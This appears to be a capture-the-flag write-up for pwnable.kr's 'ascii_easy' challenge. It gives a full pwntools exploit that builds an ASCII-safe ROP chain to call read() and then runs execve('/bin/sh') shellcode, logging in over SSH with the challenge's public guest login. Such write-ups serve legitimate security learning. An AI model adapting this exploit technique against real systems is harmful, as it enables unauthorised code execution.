그냥 맞는 가젯 찾아서 쉘 따는 노가다 문제

Exploit Code

from pwn import *

# ROP gadget addresses inside the challenge binary. The trailing comments are
# gadget-finder output: file offset followed by the gadget's disassembly; the
# absolute values are that offset plus the binary's load base. Presumably the
# gadgets were picked because every byte of their addresses survives the
# challenge's input restriction (the restriction itself is not shown on this
# page — confirm against the challenge source).
# NOTE(review): this is a Python 2-era pwntools script — the str filler below is
# concatenated directly with the bytes that p32() returns.
inc_eax = 0x556c6864
mov_ebx_edx = 0x55623542 # 0x000c5542 : mov ebx, edx ; cmp eax, 0xfffff001 ; jae 0xc5555 ; ret
pop_ecx = 0x556d2a51 # 0x00174a51 : pop ecx ; add al, 0xa ; ret
inc_edx = 0x55642d7a # 0x000e4d7a : inc edx ; xor eax, eax ; ret
mov_edx_0xffff = 0x55617940 # 0x000b9940 : mov edx, 0xffffffff ; cmovne eax, edx ; ret
inc_edi_syscall = 0x55667176
# Side effects that dictate the chain order: pop_ecx also does `add al, 0xa`
# and inc_edx also does `xor eax, eax`, so eax can only be counted up after the
# last inc_edx has run.

# Target register state for the i386 int 0x80 ABI: eax=3 (sys_read), ebx=0
# (stdin), ecx=destination buffer, edx=50 (byte count) — i.e. read(0, buf, 50);
# the shellcode sent at the bottom is what that read() pulls in.
# eax = 3, ebx = 0, ecx = 0x55667176, edx = 50 and syscall
payload = "A"*0x20  # 32 bytes of filler; presumably reaches the saved return address (offset taken from the challenge, not derived here)
# NOTE(review): the popped value is 0x55667179, three bytes past the 0x55667176
# named in the comment — presumably so the syscall gadget's own bytes are not
# overwritten and execution falls through into the data read in after it; confirm.
payload += p32(pop_ecx)+p32(0x55667179) # ecx -> 0x55667176
payload += p32(mov_edx_0xffff)+p32(inc_edx) # edx -> 0 (0xffffffff + 1 wraps to 0; the inc_edx gadget also zeroes eax)
payload += p32(mov_ebx_edx) # ebx -> 0 (eax is 0 here, so the gadget's `jae` is not taken and it falls through to ret)
payload += p32(inc_edx)*50 # edx -> 50 (read() length)
payload += p32(inc_eax)*3 # eax -> 3 (sys_read); must follow the last inc_edx, which xors eax
payload += p32(inc_edi_syscall) # issue the syscall

# pwntools' stock i386 execve("/bin/sh") stub; assembled and sent over stdin below.
shellcode = shellcraft.i386.linux.sh()

#p=process(['./ascii_easy', payload])
# Run on the challenge host over SSH; 'guest' is the login pwnable.kr publishes
# for this challenge (a credential in source is acceptable only because it is public).
sh = ssh('ascii_easy', 'pwnable.kr', password='guest', port=2222)
p = sh.process(['./ascii_easy', payload])  # the ROP payload is delivered as argv[1]

p.send(asm(shellcode))  # consumed by the read(0, buf, 50) staged by the chain
p.interactive()

Capture the Flag

image

